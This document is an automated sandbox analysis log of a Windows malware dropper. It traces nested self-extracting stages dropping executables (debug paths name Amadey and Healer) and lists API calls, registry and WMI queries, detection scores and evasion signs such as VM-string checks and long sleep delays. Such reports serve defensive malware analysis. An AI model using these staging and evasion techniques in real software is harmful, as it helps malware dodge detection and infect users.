                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeCode function: 4_2_00007FF9A5DC1A1D ControlService,ChangeServiceConfigA,4_2_00007FF9A5DC1A1D
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E74FE0 FindResourceA,LoadResource,LockResource,GetDlgItem,ShowWindow,GetDlgItem,ShowWindow,FreeResource,SendMessageA,0_2_00E74FE0
                    Source: y0EWt2mE9h.exeReversingLabs: Detection: 69%
                    Source: y0EWt2mE9h.exeVirustotal: Detection: 52%
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                    Source: unknownProcess created: C:\Users\user\Desktop\y0EWt2mE9h.exe C:\Users\user\Desktop\y0EWt2mE9h.exe
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                    Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E7597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,0_2_00E7597D
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCommand line argument: Kernel32.dll0_2_00E72BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCommand line argument: Kernel32.dll1_2_003E2BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCommand line argument: Kernel32.dll2_2_000E2BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCommand line argument: Kernel32.dll3_2_00A62BFB
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCommand line argument: 08A6_2_00413780
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeAutomated click: OK
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: y0EWt2mE9h.exeStatic file information: File size 1116672 > 1048576
                    Source: y0EWt2mE9h.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x108400
                    Source: y0EWt2mE9h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                    Source: y0EWt2mE9h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                    Source: y0EWt2mE9h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                    Source: y0EWt2mE9h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: y0EWt2mE9h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: y0EWt2mE9h.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: y0EWt2mE9h.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Binary string: wextract.pdb source: y0EWt2mE9h.exe, smi53cv51.exe.2.dr, sSH13Pp30.exe.1.dr, shS06Up82.exe.0.dr
                    Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: y0EWt2mE9h.exe, 00000000.00000003.305378937.00000000048E0000.00000004.00000020.00020000.00000000.sdmp, rTV61uz75.exe.0.dr
                    Source: Binary string: wextract.pdbGCTL source: y0EWt2mE9h.exe, smi53cv51.exe.2.dr, sSH13Pp30.exe.1.dr, shS06Up82.exe.0.dr
                    Source: Binary string: C:\sabaje resi\huwa\vacelij.pdb source: smi53cv51.exe, 00000003.00000003.309868418.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000000.344148282.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, nNy98cB79.exe.1.dr, kLL28QE.exe.3.dr
                    Source: Binary string: ^C:\wipirud\pudakucatured\mutuludo\hazucocuhu gat\jez.pdbPg source: sSH13Pp30.exe, 00000002.00000003.308887660.0000000004B4A000.00000004.00000020.00020000.00000000.sdmp, mzc23WZ.exe.2.dr
                    Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: smi53cv51.exe, 00000003.00000003.309868418.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, iGb20db.exe, 00000004.00000000.310286886.0000000000692000.00000002.00000001.01000000.00000007.sdmp, iGb20db.exe.3.dr
                    Source: Binary string: 0C:\sabaje resi\huwa\vacelij.pdbPg source: smi53cv51.exe, 00000003.00000003.309868418.00000000043BA000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000000.344148282.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, nNy98cB79.exe.1.dr, kLL28QE.exe.3.dr
                    Source: Binary string: _.pdb source: kLL28QE.exe, kLL28QE.exe, 00000006.00000002.409653940.0000000004B30000.00000004.08000000.00040000.00000000.sdmp, kLL28QE.exe, 00000006.00000002.409570001.0000000004A06000.00000004.00000020.00020000.00000000.sdmp, kLL28QE.exe, 00000006.00000003.346233138.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: C:\wipirud\pudakucatured\mutuludo\hazucocuhu gat\jez.pdb source: sSH13Pp30.exe, 00000002.00000003.308887660.0000000004B4A000.00000004.00000020.00020000.00000000.sdmp, mzc23WZ.exe.2.dr

                    Data Obfuscation

                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeUnpacked PE file: 6.2.kLL28QE.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeUnpacked PE file: 6.2.kLL28QE.exe.400000.0.unpack .text:ER;.data:W;.tizivod:R;.rotuv:R;.vuj:R;.vuwoy:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E7724D push ecx; ret 0_2_00E77260
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E724D push ecx; ret 1_2_003E7260
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E724D push ecx; ret 2_2_000E7260
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A6724D push ecx; ret 3_2_00A67260
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0041C40C push cs; iretd 6_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00423149 push eax; ret 6_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0041C50E push cs; iretd 6_2_0041C4E2
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004231C8 push eax; ret 6_2_00423179
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0040E21D push ecx; ret 6_2_0040E230
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0041C6BE push ebx; ret 6_2_0041C6BF
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_02F4C486 push edi; retf 6_2_02F4C487
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_02F4953B push FFFFFFE1h; ret 6_2_02F4954A
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E7202A memset,memset,RegCreateKeyExA,RegQueryValueExA,RegCloseKey,GetSystemDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDirectoryA,GetModuleFileNameA,LocalAlloc,RegCloseKey,RegSetValueExA,RegCloseKey,LocalFree,0_2_00E7202A
                    Source: iGb20db.exe.3.drStatic PE information: 0xE382D401 [Fri Dec 15 06:19:45 2090 UTC]
                    Source: nNy98cB79.exe.1.drStatic PE information: section name: .tizivod
                    Source: nNy98cB79.exe.1.drStatic PE information: section name: .rotuv
                    Source: nNy98cB79.exe.1.drStatic PE information: section name: .vuj
                    Source: nNy98cB79.exe.1.drStatic PE information: section name: .vuwoy
                    Source: mzc23WZ.exe.2.drStatic PE information: section name: .zar
                    Source: mzc23WZ.exe.2.drStatic PE information: section name: .dat
                    Source: mzc23WZ.exe.2.drStatic PE information: section name: .zire
                    Source: mzc23WZ.exe.2.drStatic PE information: section name: .zimikuy
                    Source: kLL28QE.exe.3.drStatic PE information: section name: .tizivod
                    Source: kLL28QE.exe.3.drStatic PE information: section name: .rotuv
                    Source: kLL28QE.exe.3.drStatic PE information: section name: .vuj
                    Source: kLL28QE.exe.3.drStatic PE information: section name: .vuwoy
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exe
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeFile created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeFile created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\nNy98cB79.exe
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeFile created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E71AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,0_2_00E71AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,1_2_003E1AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E1AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,2_2_000E1AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A61AE8 CompareStringA,GetFileAttributesA,LocalAlloc,GetPrivateProfileIntA,GetPrivateProfileStringA,GetShortPathNameA,CompareStringA,LocalAlloc,LocalAlloc,GetFileAttributesA,3_2_00A61AE8
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe TID: 4888Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe TID: 5576Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe TID: 4724Thread sleep count: 1863 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exe TID: 632Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWindow / User API: threadDelayed 1863Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-2575
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_1-2454
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-2449
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP000.TMP\rTV61uz75.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\IXP002.TMP\mzc23WZ.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeRegistry key enumerated: More than 149 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: kLL28QE.exe, 00000006.00000002.414920676.00000000080FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: kLL28QE.exe, 00000006.00000002.414920676.00000000080FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareHMSHRMWOWin32_VideoControllerPR9YUGSBVideoController120060621000000.000000-000.18.6438display.infMSBDAWPVM7RCHPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsBDFLK2YO8
                    Source: kLL28QE.exe, 00000006.00000002.414920676.00000000080FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_VideoController(Standard display types)VMwareHMSHRMWOWin32_VideoControllerPR9YUGSBVideoController120060621000000.000000-000.18.6438display.infMSBDAWPVM7RCHPCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colorsBDFLK2YOPro|C:\Wind
                    Source: kLL28QE.exe, 00000006.00000002.414920676.00000000080FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E75467 GetSystemInfo,CreateDirectoryA,RemoveDirectoryA,0_2_00E75467
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E72390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00E72390
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_003E2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_000E2390
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A62390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_00A62390
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_02F47A23 push dword ptr fs:[00000030h]6_2_02F47A23
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0040ADB0 GetProcessHeap,HeapFree,6_2_0040ADB0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeMemory allocated: page read and write | page guardJump to behavior
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E76F40 SetUnhandledExceptionFilter,0_2_00E76F40
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E76CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00E76CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E6F40 SetUnhandledExceptionFilter,1_2_003E6F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\shS06Up82.exeCode function: 1_2_003E6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_003E6CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E6F40 SetUnhandledExceptionFilter,2_2_000E6F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sSH13Pp30.exeCode function: 2_2_000E6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_000E6CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A66F40 SetUnhandledExceptionFilter,3_2_00A66F40
                    Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\smi53cv51.exeCode function: 3_2_00A66CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00A66CF0
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040E61C
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00416F6A
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: 6_2_004123F1 SetUnhandledExceptionFilter,6_2_004123F1
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E717EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,0_2_00E717EE
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeCode function: GetLocaleInfoA,6_2_00417A20
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeQueries volume information: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\kLL28QE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E77155 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00E77155
                    Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\iGb20db.exeCode function: 4_2_00007FF9A5DC077D GetUserNameA,4_2_00007FF9A5DC077D
                    Source: C:\Users\user\Desktop\y0EWt2mE9h.exeCode function: 0_2_00E72BFB GetVersion,GetModuleHandleW,GetProcAddress,CloseHandle,0_2_00E72BFB

